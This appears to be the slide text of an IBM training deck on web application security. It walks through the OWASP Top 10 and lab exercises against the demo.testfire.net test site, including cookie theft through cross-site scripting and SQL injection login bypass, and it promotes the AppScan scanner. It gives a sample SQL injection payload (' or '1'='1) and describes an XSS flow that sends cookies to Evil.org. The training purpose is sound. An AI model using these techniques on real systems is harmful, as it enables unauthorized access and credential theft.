discovering the value of verifying web application security using ibm rational appscan aka hacking...

© 2007 IBM Corporation

IBM Software Group

An IBM Proof of Technology

Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan

Lee Kinsman – Software Architect

Alan Kan – Technical Specialist

Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan© 2007 IBM Corporation 2

TechWorks

Agenda

● Introductions & facilities

● The importance of web application security

● Vulnerability Analysis Top Attacks Overview

Hands on Labs 1-2

● Vulnerability Analysis (continued) Hands on Labs 3-5

● Automated Vulnerability Analysis AppScan Overview

Hands on Lab 6


TechWorks

POT Objectives

By the end of this session you will:

Understand the web application environment

Understand and differentiate between network and application level vulnerabilities

Understand where the vulnerabilities exist

Understand how to leverage AppScan to perform an automated scan for vulnerabilities


TechWorks

Agenda




Hands on Labs 1-2



Hands on Lab 6


TechWorks

LexisNexis

Data Breach

-Washington Post

Feb 17, 2008

IndiaTimes.com Malware

—InformationWeek

Feb 17,2008

Hacker breaks into

Ecuador’s

presidential website

— Thaindian, Feb 11, 2008

Hacking Stage 6 — Wikipedia, Feb 9 2007

Hacker steals Davidson

Cos client data

- Falls Tribune, Feb 4 2008

RIAA wiped off the Net— TheRegister, Jan 20 2008

Chinese hacker

steals 18M identities

- HackBase.com, Feb 10,2008

Mac blogs defaced by

XSS

• The Register, Feb 17, 2008

Your Free MacWorld Expo Platinum Pass— CNet, Jan 14, 2008

Hacker takes down Pennsylvania gvmt — AP, Jan 6, 2008

Drive-by Pharming

in the Wild

— Symantec, Jan 21 2008Italian Bank hit by XSS fraudsters

— Netcraft, Jan 8 2008

The Alarming Truth

Greek Ministry

websites hit by

hacker intru

sion

— eKathimerini, Jan 31,2008


TechWorks

“Security Intelligence Service director Warren Tucker revealed government department websites had been attacked and information stolen”nzherald.co.nz Sep 12, 2007

“A florist which does all of its business online has had its website targeted by hackers and customers' credit card details have been stolen. “abc.net.au Sep 17, 2007

“Turkish hackers bring down insurer's site…The site was shut down as a precaution and was unavailable for most of today”SMH.com.au July 20, 2007

“Computer hackers have cracked the defences of dozens of top government and business sector internet sites this year, raising concerns about the safety of consumers' financial and personal information.” SMH.com.au October 14 2007

“Approximately 100 million Americans have been informed that they have suffered a security breach so this problem has reached epidemic proportions.”Jon Oltsik – Enterprise Strategy Group

The Alarming Truth


TechWorks

Security and compliance risks

Security and compliance integrity risks have serious adverse impacts on a company’s identity, customer relations and business results.

● 90% of sites are vulnerable to application attacks

● 80% of organizations will experience an application security incident by 2010

● 64% of CIOs feel that the most significant challenge facing IT organizations is Security, Compliance and Data Protection.

(Disability Discrimination Act (DDA), Payment Card Industry (PCI) Standards, SOX

● 75% of the cyber attacks today are at the application level

● Compliance requirements: Payment Card Industry (PCI) Standards, GLBA, HIPPA, FISMA


TechWorks

Sources: Gartner, Watchfire

Reality: Security and Spending Are Unbalanced

Network Server

WebApplication

s

% of Attacks % of Dollars

75%

10%

25%

90%

Sources: Gartner, Watchfire

Security Spending

of All Attacks on Information SecurityAre Directed to the Web Application Layer

75%75%

of All Web Applications Are Vulnerable2/32/3


TechWorks

2006 Vulnerability Statistics (31,373 sites)

** http://www.webappsec.org/projects/statistics/


TechWorks

We Use Network Vulnerability

Scanners

We Use Network Vulnerability

Scanners

We Have Firewalls in

Place

We Have Firewalls in

PlaceWe Audit It Once a Quarter with Pen

Testers

We Audit It Once a Quarter with Pen

Testers

The Myth: Our Site Is Safe

We Use SSLEncryption

We Use SSLEncryption


TechWorks

Confusing Network Security Discipline with Application Security

“Application developers and their superiors in IT departments too often mistakenly believe that firewalls, IDS / IPS, and network traffic encryption

are sufficient measures for application security. By doing so they are confusing application security with network security”

“None of those technologies hardens application code. All those technologies deal with traffic to applications, not with the applications themselves…. Applications need protection through separate, specific

security discipline – application security”

Application Security Testing, Gartner, March 2, 2007


TechWorks

High Level Web Application Architecture Review

(Presentation)App Server(Business

Logic)

DatabaseClient Tier(Browser)

Middle TierData Tier

Firewall

Sensitive data is

stored here

SSL

Protects Transport Protects

Network

CustomerApp is deployedhere

InternetInternet


TechWorks

Perimeter IDS IPS

IntrusionDetectionSystem

IntrusionPrevention

System

Network Defenses for Web Applications

App Firewall

ApplicationFirewall

Firewall

System Incident Event Management (SIEM)

SecuritySecurity


TechWorks

Port 80 and Port 443 are open for business….


TechWorks

Building Security & Compliance into the SDLC

Build

Developers

SDLC

Developers

Developers

Coding QA Security Production

Enable Security to effectively drive remediation into development

Provides Developers and Testers with expertise on detection and

remediation ability

Ensure vulnerabilities are addressed before applications are put into production


TechWorks

Agenda




Hands on Labs 1-2



Hands on Lab 6


TechWorks

NetworkNetwork

Operating SystemOperating System

ApplicationsApplications

DatabaseDatabase

Web Server

Web Server Configuration

Web Server


Third-party ComponentsThird-party Components

Web Applications

Client-Side Custom Web Services

Web Applications


Where are the Vulnerabilities?

Network

NessusISSQualysGuardeEye RetinaFoundstone

Host

SymantecNetIQISSCA Harris STAT

Database

AppSec IncNGS Software

App Scanners

WatchfireSPI DynamicsCenzicNT ObjectivesAcunetix WVS

Code ScanningEmerging

TechFortifyOunce LabsSecure SoftwareKlockworkParasoft

Network

Operating System

Applications

Database

Web Server


Third-party Components

Web Applications


SecuritySecurity


TechWorks

Security Defects: Those I manage vs. Those I ownInfrastructure Vulnerabilities or Common Web Vulnerabilities (CWVs)

Application Specific Vulnerabilities (ASVs)

Cause of DefectInsecure application development by 3rd party SW

Insecure application development In-house

Location within Application

3rd party technical building blocks or infrastructure (web servers,)

Business logic - dynamic data consumed by an application

Type(s) of ExploitsKnown vulnerabilities (patches issued), misconfiguration

SQL injection, path tampering, Cross site scripting, Suspect content & cookie poisoning

DetectionMatch signatures & check for known misconfigurations.

Requires application specific knowledge

Business Risk Patch latency primary issueRequires automatic application lifecycle security

Cost Control As secure as 3rd party software Early detection saves $$$


TechWorks

OWASP and the OWASP Top 10 list

● Open Web Application Security Project – an open organization dedicated to fight insecure software

● “The OWASP Top Ten document represents a broad consensus about what the most critical web application security flaws are”

● We will use the Top 10 list to cover some of the most common security issues in web applications


TechWorks

Application Threat Negative Impact Example Impact

Cross Site scripting Identity Theft, Sensitive Information Leakage, …

Hackers can impersonate legitimate users, and control their accounts.

Injection Flaws Attacker can manipulate queries to the DB / LDAP / Other system

Hackers can access backend database information, alter it or steal it.

Malicious File Execution Execute shell commands on server, up to full control

Site modified to transfer all interactions to the hacker.

Insecure Direct Object Reference

Attacker can access sensitive files and resources

Web application returns contents of sensitive file (instead of harmless one)

Cross-Site Request Forgery Attacker can invoke “blind” actions on web applications, impersonating as a trusted user

Blind requests to bank account transfer money to hacker

Information Leakage and Improper Error Handling

Attackers can gain detailed system information

Malicious system reconnaissance may assist in developing further attacks

Broken Authentication & Session Management

Session tokens not guarded or invalidated properly

Hacker can “force” session token on victim; session tokens can be stolen after logout

Insecure Cryptographic Storage

Weak encryption techniques may lead to broken encryption

Confidential information (SSN, Credit Cards) can be decrypted by malicious users

Insecure Communications Sensitive info sent unencrypted over insecure channel

Unencrypted credentials “sniffed” and used by hacker to impersonate user

Failure to Restrict URL Access Hacker can access unauthorized resources

Hacker can forcefully browse and access a page past the login page

The OWASP Top 10 list


TechWorks

1. Cross-Site Scripting (XSS)

● What is it? Malicious script echoed back into HTML returned from a trusted site, and runs under trusted

context

● What are the implications? Session Tokens stolen (browser security circumvented)

Complete page content compromised

Future pages in browser compromised


TechWorks

Cross Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’s cookie and session information without the user’s consent or knowledge

5) Evil.org uses stolen session information to impersonate user


TechWorks

XSS Example I

HTML code:


TechWorks

XSS Example II

HTML code:


TechWorks

XSS – Details

● Common in Search, Error Pages and returned forms. But can be found on any type of page

● Any input may be echoed back Path, Query, Post-data, Cookie, Header, etc.

● Browser technology used to aid attack XMLHttpRequest (AJAX), Flash, IFrame…

● Has many variations XSS in attribute, DOM Based XSS, etc.


TechWorks

Exploiting XSS

● If I can get you to run my JavaScript, I can… Steal your cookies for the domain you’re browsing

Track every action you do in that browser from now on

Redirect you to a Phishing site

Completely modify the content of any page you see on this domain

Exploit browser vulnerabilities to take over machine

…

● XSS is the Top Security Risk today (most exploited)


TechWorks

Agenda




Hands on Labs 1-2



Hands on Lab 6


TechWorks

Hands-on Labs

Lab 1 – Profile Web Application

Lab 2 – Steal Cookies

Lab 3 – Login without Credentials

Lab 4 – Steal Usernames and Passwords

Lab 5 – Logging into the Administrative Portal

Lab 6 – Automated Scan of Website


TechWorks

Lab 1 Profile Web Application

● The Goal of this lab is to profile the demo.testfire.net application

● Identify the Lab Workbook and where to start (page 5), where to stop (page 11)


TechWorks

Lab 2 Steal Cookies

● The goals of the lab is to utilize a Cross Site Scripting vulnerability on the demo.testfire.net application in order to access cookies on a target user’s browser



TechWorks

Agenda


● Security Landscape


Hands on Labs 1-2



Hands on Lab 6


TechWorks

2 - Injection Flaws

● What is it? User-supplied data is sent to an interpreter as part of a command, query or data.

● What are the implications? SQL Injection – Access/modify data in DB

SSI Injection – Execute commands on server and access sensitive data

LDAP Injection – Bypass authentication

…


TechWorks

SQL Injection

● User input inserted into SQL Command: Get product details by id:

Select * from products where id=‘$REQUEST[“id”]’;

Hack: send param id with value ‘ or ‘1’=‘1

Resulting executed SQL:Select * from products where id=‘’ or ‘1’=‘1’

All products returned


TechWorks

SQL Injection Example I


TechWorks

SQL Injection Example II


TechWorks

SQL Injection Example - Exploit


TechWorks

SQL Injection Example - Outcome


TechWorks

Injection Flaws (SSI Injection Example) Creating commands from input


TechWorks

The return is the private SSL key of the server


TechWorks

3 - Malicious File Execution

● What is it? Application tricked into executing commands or creating files on server

● What are the implications? Command execution on server – complete takeover

Site Defacement, including XSS option


TechWorks

Malicious File Execution – Example I


TechWorks

Malicious File Execution – Example cont.


TechWorks

4 - Insecure Direct Object Reference

● What is it? Part or all of a resource (file, table, etc.) name controlled by user input.

● What are the implications? Access to sensitive resources

Information Leakage, aids future hacks


TechWorks

Insecure Direct Object Reference - Example


TechWorks

Insecure Direct Object Reference – Example Cont.


TechWorks

5 - Information Leakage and Improper Error Handling

● What is it? Unneeded information made available via errors or other means.

● What are the implications? Sensitive data exposed

Web App internals and logic exposed (source code, SQL syntax, exception call stacks, etc.)

Information aids in further hacks


TechWorks

Information Leakage - Example


TechWorks

Improper Error Handling - Example


TechWorks

Information Leakage – Different User/Pass Error


TechWorks

6 - Failure to Restrict URL Access

● What is it? Resources that should only be available to authorized users can be accessed by forcefully

browsing them

● What are the implications? Sensitive information leaked/modified

Admin privileges made available to hacker


TechWorks

Failure to Restrict URL Access - Admin User login

/admin/admin.aspx


TechWorks

Simple user logs in, forcefully browses to admin page


TechWorks

Failure to Restrict URL Access: Privilege Escalation Types

● Access given to completely restricted resources Accessing files that shouldn’t be served (*.bak, “Copy Of”, *.inc, *.cs, ws_ftp.log, etc.)

● Vertical Privilege Escalation Unknown user accessing pages past login page

Simple user accessing admin pages

● Horizontal Privilege Escalation User accessing other user’s pages

Example: Bank account user accessing another’s


TechWorks

Agenda




Hands on Labs 1-2



Hands on Lab 6


TechWorks

Hands-on Labs 3-5

Lab 1 – Profile Web Application

Lab 2 – Steal Cookies

Lab 3 – Login without Credentials

Lab 4 – Steal Usernames and Passwords

Lab 5 – Logging into the Administrative Portal

Lab 6 – Automated Scan of Website


TechWorks

Lab 3 overview Login without Credentials

● The goal of the lab is to use locate a SQL injection vulnerability and exploit it to log into the demo.testfire.net application without a password



TechWorks

Lab 4 overview – Steal Username and Password

● The Goal of this Lab is to exploit the SQL Injection vulnerability further in order to extract all the usernames and passwords from the demo.testfire.net application



TechWorks

Lab 5 overview – Logging in to Admin Portal

● The Goal of this lab is to use Information Leakage and Direct Access to URLs to find and log into the administrative portal



TechWorks

Agenda




Hands on Labs 1-2



Hands on Lab 6


TechWorks

Watchfire in the Rational Portfolio

Developer Test Functional Test

Automated Manual

Rational RequisitePro Rational ClearQuest Rational ClearQuest

Defects

Project Dashboards

Detailed Test Results

Quality Reports

Performance Test

SOFTWARE QUALITY SOLUTIONS

Test and Change Management

Test Automation

Quality Metrics

DE

VE

LO

PM

EN

T

OP

ER

AT

OIN

S

BUSINESS

Rational ClearQuest

Requirements Test Change

Rational PurifyPlus

Rational Test RealTime

Rational Functional Tester Plus

Rational Functional Tester

Rational Robot

Rational Manual Tester

Rational Performance Tester

Security and Compliance Test

AppScan

Policy Tester

Interface Compliance

Policy Tester

Test Automation

Content Compliance

ADA 508, GLBA, Safe Harbor

Quality, Brand, Search, Inventory


TechWorks

AppScan

● What is it?

AppScan is an automated tool used to perform vulnerability assessments on Web Applications

● Why do I need it?

To simplify finding and fixing web application security problems

● What does it do?

Scans web applications, finds security issues and reports on them in an actionable fashion

● Who uses it?

Security Auditors – main users today

QA engineers – when the auditors become the bottle neck

Developers – to find issues as early as possible (most efficient)


TechWorks

What does AppScan test for?

Network

Operating System

Applications

Database

Web Server


Third-party Components

Web Applications

AppScan


TechWorks

How does AppScan work?

● Approaches an application as a black-box

● Traverses a web application and builds the site model

● Determines the attack vectors based on the selected Test policy

● Tests by sending modified HTTP requests to the application and examining the HTTP response according to validate rules

HTTP Request

Web Application

HTTP Response

WebServers

Application

Databases


TechWorks

AppScan Goes Beyond Pointing out Problems


TechWorks

Actionable Fix Recommendations


TechWorks

AppScan with QA Defect Logger for ClearQuest


TechWorks

IBM Watchfire on the Net

● Watchfire.com - http://www.watchfire.com Product evaluation download

● AppScan Extensions Framework – http://axf.watchfire.com Power Point Reporter, Pyscan, Defect Logger CQ

● Watchfire Blog – http://blog.watchfire.com/wfblog Expert opinion and watchfire news

● AppScan Knowledge On Demand (computer based training) App Security 101, OWASP Top 10, WASC Threat Classifications, Common Attacks


TechWorks

Lab 6 overview

● The goal of this lab is to use AppScan in order to automate the detection of vulnerabilities within a web application



TechWorks

Session summary

Understand the web application environment

Understand and differentiate between network and application level vulnerabilities

Understand where the vulnerabilities exist

Hands on exercises to understand types of vulnerabilities

Hands on exercise to leverage automated scan for vulnerabilities


TechWorks

Next steps● Further discussions with IBM Rational Account Representative and/or AppScan

product expert. Jono Massy-Greene

[email protected]

Alan [email protected]

● Schedule a Security Business Value Assessment

● Schedule a Vulnerability Assessment of one our your Applications


TechWorks

Register today with discount code “HDDE”and receive $100 off your registration fee!

Visitwww.ibm.com/rational/rsdc

for more information

IBM Rational Software Development Conference 2008June 1 – 5, 2008; Orlando, Florida

CONFERENCE HIGHLIGHTS:

Over 3,000 customers and partners

Over 300 sessions – 14 tracks

Executive Summit 2008

3- and 5-hour Technical Workshops

Access to IBM Engineers and IBM Research

Keynotes with industry-leading experts

Exhibit hall showcasing complimentary product and services

Unlimited networking opportunities

IBM Solution Center

Interactive Birds-of-a-Feather Sessions


TechWorks


TechWorks

We appreciate your feedback. Please fill out the survey form in order

to improve this educational event.

discovering the value of verifying web application security using ibm rational appscan aka hacking...

Technology

application security

confusing application

security compliance

information security

security breach

application attacks

fisma security

web application layer